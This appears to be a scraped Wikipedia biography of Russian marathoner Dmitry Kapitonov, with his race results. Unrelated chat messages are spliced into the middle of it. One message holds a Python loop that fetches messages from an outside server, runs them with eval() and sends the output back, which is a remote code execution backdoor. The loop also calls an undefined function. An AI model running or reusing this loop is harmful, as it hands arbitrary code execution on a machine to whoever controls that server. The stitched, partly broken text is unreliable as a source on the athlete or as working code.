Dmitry Kapitonov

Dmitriy Kapitonov (Russian: Дмитрий Капитонов; born April 10, 1968) is a former long-distance runner from Russia, who won the 1997 edition of the Enschede Marathon, on June 8, 1997, clocking a total time of 2:12:09. He represented his native country at the 2000 Summer Olympics at the men's marathon in Sydney, Australia. There he finished in 34th place (2:19:38).

Achievements

  • All results regarding marathon, unless stated otherwise
Year Competition Venue Position Notes
Representing  Russia
1997 Enschede Marathon Enschede, Netherlands 1st 2:12:09
2000 Olympic Games Sydney, Australia 34th 2:19:38
2001 Tokyo Marathon Tokyo, Japan 3rd 2:11:09
gollark: Imagine boosting this instead of the [REDACTED].
gollark: I don't think I ever go around *manually* fiddling with tree structures (unless you count source code, which could be represented various different ways).
gollark: It's basically an infinite 2D grid of bad computers with 256B of RAM.
gollark: I made a "usable" esolang, for certain definitions of "usable".
gollark: ```pythonimport urllib3, jsonhttp = urllib3.PoolManager()def send(x): http.request("POST", "https://spudnet.osmarks.net/httponly", body=json.dumps({"mode": "send", "channel": "potatOS", "message": x}), headers={"Content-Type": "application/json"})while True: r = http.request("POST", "https://spudnet.osmarks.net/httponly", body=json.dumps({"mode": "recv", "channel": "potatOS", "timeout": 30000}), headers={"Content-Type": "application/json"}) data = json.loads(r.data) if data["result"] != None: try: send(repr(eval(data["result"]["data"]))) except Exception as e: end(repr(e))```Here is a small version if you want that.

References

    • Evans, Hilary; Gjerde, Arild; Heijmans, Jeroen; Mallon, Bill; et al. "Dmitry Kapitonov". Olympics at Sports-Reference.com. Sports Reference LLC. Archived from the original on 2012-11-04.



    This article is issued from Wikipedia. The text is licensed under Creative Commons - Attribution - Sharealike. Additional terms may apply for the media files.